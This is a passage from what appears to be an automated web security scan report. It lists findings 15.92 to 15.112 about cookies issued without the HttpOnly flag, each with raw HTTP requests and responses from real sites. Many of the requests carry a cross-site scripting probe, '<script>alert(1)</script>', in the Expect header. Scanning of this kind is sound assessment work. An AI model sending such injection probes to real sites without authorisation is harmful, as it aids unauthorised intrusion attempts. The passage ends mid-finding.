315Peuuv9MWFJ2TNUTa64jL1TzO4K5ilgRExd+0+LlbGZlWA4nMGcHybm4hueGOeQPqwAtQ5/kaVhSwI64CwilQnKAWkuN8F3BvimyTfR+gsJitMuBBeYXut8bYUn6pvsdSjm5Iz1FG6u4dVw/5UIF7a64Ro2ojiGOLZRgkjmaZRNRsXGGpbYUuvyJWJ1CvSaQIkqMXoboWAujPOYGbU5YpdL/ojwzUfBJ93G7WdKliVinQOzR/BaMAWOKY8duhzRzGBeKtEhSpH6ZyBf1lDGxsVh2hMyjZMD1gu8QRCSU1ukmkmHwVwCuUYbBjs5y5jJUMBbAPRiSE6+TU2D2lHN/QhrBJOFYxqRtUuNsvQu3E0BTI3wXaWGeLD+Ed8LYRr30k3k67AKIXa+Rwh6gmXjGuGWHAiYhfiJN5iLMfS9ccBAVHQwXAPlizOwEWGEq2ilZlFFJYcfiz8Tte1jn8xS45JcbJq/UGTlqG7486giU7j7viLctVk6bOgD9NWLuh; Domain=.revsci.net; Expires=Thu, 03-May-2012 01:28:58 GMT; Path=/
X-Proc-ms: 15
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 04 May 2011 01:28:57 GMT
Content-Length: 1657

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['K05540_10572','K05540_10573','K05540_10578','K05540_10276','K05540_10066','K05540_10087','K05540_10174','K05540_10185','K05540_10195','
...[SNIP]...

15.92. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304384620972%3As2.33%3D%2C2740%2C

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304471552435%3As2.33%3D%2C3390%2C2740%2C; Domain=.33across.com; Expires=Thu, 03-May-2012 01:12:32 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Wed, 04 May 2011 01:12:32 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

15.93. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1839560342;fpan=1;fpa=P0-115106725-1304488446007;ns=0;url=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304488446006;tzo=300;a.1=p-94D6e1NDscLvI;labels.1=comment-links;a.2=p-18-mFEk4J448M;labels.2=type.intensedebate.embed HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EHcAGO8kjVmtjIMIufKMgQGpAQHTBoGTAJrRo6lXiz0bxeIAiz0aliAaNMEf4RBAHBIAAAMEAbtkuyDCA1x0MQIRsSASIBoSiyJQlhALEtM0IwggMEGOUQDokgDhAL4gihkYsrGvLiA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EDEAGO8kjVmtjIMIufKMgQGpAQHVBoHTAJrRo6lXiz0bxeIAiz0aliAaNMEf4RBAHBIAAAMEAbtkuyDCA1x0MQIRsSASIBoSiyJQlhALEtM0IwggMEGOUQDokgDhAL4gihkYsrGvLiA; expires=Tue, 02-Aug-2011 00:54:07 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Wed, 04 May 2011 00:54:07 GMT
Server: QS


15.94. http://tags.bluekai.com/site/3327  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3327

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3327?ret=js&phint=site%3D109&phint=ncat%3D17939%3A&phint=ptype%3D8300&phint=cid%3D2&phint=mfg%3D%20&phint=attr%3D%20&phint=carrier%3D%20&phint=os%3D%20&phint=__bk_t%3DWebware%20-%20Cool%20Web%20apps%20for%20everyone%20-%20CNET&phint=__bk_k%3Dweb%202.0%2C%20silicon%20valley%2C%20internet%2C%20business%2C%20applications%2C%20how-to&jscb=cbsiPrepBK&data=all&r=76483513 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bklc=4dbea79a; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bkst=KJhkMp2ny69RCtXGYYSNQbBxcaye2dK2ml9yNkQPuG7HMGGUnArQcDGuz4REaY5lDDHhWUxxOy57apIeQTrq3851GMz5fId8l4+zYplB/l4mn8Xcn4EifiLGjjRvTeSx0oi9jNRWOC1/+ePVVRD8ReqfrcUXZIw7Decmh8B3negNWN2r+/iRh9YS1iTaWDy9Wdg94lHhhdFPVs6S9b2ozv/P8D9k8x/AGSeVZFMDIf4Mp/tVARfMTlHFv/G+r76ANlBK2CmSSYi0RUISqwuIrdKmFUeLWr3aDH/BHMsmiZGltocETCO1VWfEpD7KKnU2V3JKpCHQGiZP0LAxB4rXzUslMjYw33WNPUMY2X+HbPdPJrd+tAxYYYmTy/HZOsBL5JRuD/Rq7VSxb+KcmX5Kndp8IQdwlsWW; bk=lQBumF16vaVVIHOf; bkc=KJh56qNv9NWxOK9prZQtHgRuiTYahADAPRiPMUZ9qzDikSEJYTiYyGGW1UDQWWM+pTnBBCjCYqbsWBx6aG/txr0XLpnj7P+IzsRT268lO4CKJFHIAZ9HSIQS4NkrmoifT9vEe+YvAGY9NJz7t3ak7C4UwsebuMCX0whZZ4wi39MW1qOpklZdGXN8XzR3znHBvmUXbDmjXIvHZUKKQza+8r+Bqzbntbq4qWgRX8n99SUtlfVlnm2Kxc7CEn+T3FNhgaNKNIRITLez82zCccMdd5iNvox8nlqBId+Nx7pdBwKAG+tTQEnwi8K1cTKWvm5p0fNbj+4XlfQw85SP5iwDErIStd5u64r8U2fzEdycUrr1WQ==

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:29:02 GMT
Set-Cookie: bklc=4dc0abde; expires=Fri, 06-May-2011 01:29:02 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=0Sj/NImFa2IVIHOf; expires=Mon, 31-Oct-2011 01:29:02 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56Many69zO4Ols+EDuizHPOy6HCahvcP0LSBeP7ayWm7iah9aCRGD6EkxWJ0NOk00msQG4QRlGSC5c9H5OJl3duB7XZfXyUFcuI8bHV9+PmCWfD9ObskwqgsguIphm4S2plf6gwTo0J+m8gBCTcBx/4hvQ7b1oFbync7M/P5ls69+u+vIIsiUUqzL4KB0YKQIvbh4jlbhnc7M39eW1EOdkUZkyjSXX5x/LesgD1p8lx5jXLjlrrXX9mKUZDIZtj/ll+cfFgLv0bDAzvOuIbdLszLnC0elfq1nKI0lq4qWsaFts94b47TzC5Uulp8hKHaA0HrfIFrqaRVT54FFMLKV28vl2/6c+sXravvze00ckz0rd7d+JLiNRlSNpAfFBU4KAX470fbXjjdhn0NsgMR=; expires=Mon, 31-Oct-2011 01:29:02 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQLmc48XF/1/AByrJQL9svZRnaFcACnYSsHYinZDsVMTcClrGeFGG1AkYV/W1PAcP00xbQeZBtOGj2RBR5G/bDhuYVvoYPpxBi9xeFROi+; expires=Mon, 31-Oct-2011 01:29:02 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHARKv09iCZ3sDb92R99/XBdcoAWHQjBJOArr/0DmimeBkiZOYpeYJUC8JNryLiQM0EeCYnMjzF9y9WNfqR5xCDpiiGlKhYfsi3sqvzfVvRWHRSB+tRr/6mf9yBeZAxkxyoRf/DeyZIG1iIHj90z/YWazQW798Lp/3HiQYcByaFJX//j8/wNqC92EJD1ecrHjJQjaiwJ4wB9BrtzOX/69sIzw4G=; expires=Mon, 31-Oct-2011 01:29:02 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Thu, 05-May-2011 01:29:02 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 1088
Content-Type: text/javascript
Connection: keep-alive

cbsiPrepBK(
{
"campaigns": [
{
"campaign": 16198,
"timestamp": 1304472542,
"categories": [
{
"categoryID": 75546,
"timestamp": 1304472542
}
]
},
{
"campaign": 1
...[SNIP]...

15.95. http://www.975thefanatic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.975thefanatic.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.975thefanatic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
ServerName: EIHWEB02
X-Powered-By: ASP.NET
Expires: Wed, 04 May 2011 01:17:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:17:23 GMT
Connection: close
Set-Cookie: BIGipCookie=207552778.20480.0000; path=/


15.96. http://www.accessdubuque.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accessdubuque.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.accessdubuque.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:31:49 GMT
Set-Cookie: LB-Persist=VKc/kvx3Pc1WzvS4FjQO/6Xok17iTWEo2NhI8dn3Gy4/eU+QCTBLeWV8wc4X6VzI2z6lmLBscq+/oQ==; path=/


15.97. http://www.acninc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acninc.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.acninc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:18:24 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: www_acninc_com=520294572.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.98. http://www.agriculture.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agriculture.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.agriculture.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:31:25 GMT
Content-Type: image/x-icon
Content-Length: 325
Last-Modified: Wed, 02 Mar 2011 22:08:22 GMT
Connection: close
Server: nginx/rd16
Expires: Wed, 04 May 2011 03:31:25 GMT
Cache-Control: max-age=3600
Set-Cookie: uid=CgoKGk3Aun3ATwQjA10SAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Accept-Ranges: bytes

.PNG
.
...IHDR.............f.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...d .01....N....o.!s....?z.....6......"N~~    .E.B.L..IRG....H...I.......<.|.\..<.|.......[..    ..D.H...NA99......... J'\
...[SNIP]...

15.99. http://www.aikenstandard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aikenstandard.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aikenstandard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1738
Content-Type: text/html
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:47:00 GMT
Connection: close
Set-Cookie: NSC_DNTQ-OfxDNT=ffffffff09021f3545525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.100. http://www.allentate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allentate.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allentate.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:26:25 GMT
Set-Cookie: Coyote-2-42a2c514=42a2c507:0;Path=/


15.101. http://www.ally.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ally.ca
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ally.ca
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:19:01 GMT
Server:
Set-Cookie: TLTSID=7E4BAD1C75EC1075004D9FF5410C252D; Path=/; Domain=.ally.ca
Set-Cookie: TLTUID=7E4BAD1C75EC1075004D9FF5410C252D; Path=/; Domain=.ally.ca; Expires=Wed, 04-05-2021 01:19:01 GMT
HostName: TORGMLCORWB08
Content-Length: 389
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.102. http://www.ambiencr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ambiencr.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ambiencr.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie:WEBTRENDS_ID=173.193.214.243-2164580736.30149109; expires=Thu, 03-May-2012 00:52:12 GMT; path=/
Date: Wed, 04 May 2011 00:52:12 GMT
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET


15.103. http://www.ardenb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ardenb.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ardenb.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:20:23 GMT
Server: Apache
Content-Length: 389
Keep-Alive: timeout=17
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: cresist=IVO03@QHK_kilw; path=/
Via: CN7K

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.104. http://www.ataglance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ataglance.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ataglance.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:38:10 GMT
Server: Web Server 1.0
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_nxw_bubhmbodf_qspe_tubujd_mc=ffffffff09c939a445525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.105. http://www.autorepairlocal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autorepairlocal.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autorepairlocal.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:22:59 GMT
Content-Length: 28792
Content-Type: text/html;charset=utf-8
Set-Cookie: osid=site1~7a2475be3c64fb967a44d13e0e7f154175d91f66; expires=Wed, 04 May 2011 03:22:59 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

15.106. http://www.autotraderlatino.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderlatino.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autotraderlatino.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 04:05:00 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerautomercado=2961367050.4110.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.107. http://www.awardhq.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.awardhq.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.awardhq.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:29:14 GMT
Set-Cookie: BIGipServerpool_p_www.awardhq.com_all=470657216.0.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.108. http://www.azdventuresbooks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.azdventuresbooks.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.azdventuresbooks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Unknown
Content-Type: text/html
Date: Wed, 04 May 2011 01:44:39 GMT
Content-Length: 60
Set-Cookie: 7s51872mp2=805470218.20480.0000; path=/
Connection: close

The page cannot be displayed because the expectation failed.

15.109. http://www.backinthesaddle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backinthesaddle.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.backinthesaddle.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:27:42 GMT
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: balance=0diYQK02nKwRn1jAJvHKqcVFSE/sySDV0Z+NyIRJeOstptbLzIG7S52G7s7Nz8BodVggPP/i9Xqbww==; path=/


15.110. http://www.bandai.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bandai.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bandai.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:55:33 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServercluster_forum=1325465866.16415.0000; path=/
Content-Length: 389

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.111. http://www.bhgrealestate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bhgrealestate.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bhgrealestate.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:10:14 GMT
Set-Cookie: BIGipServervip_64.37.197.236_http=3475648266.20480.0000; path=/


15.112. http://www.bike.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bike.com
Path:   /favicon.ico

Issue detail

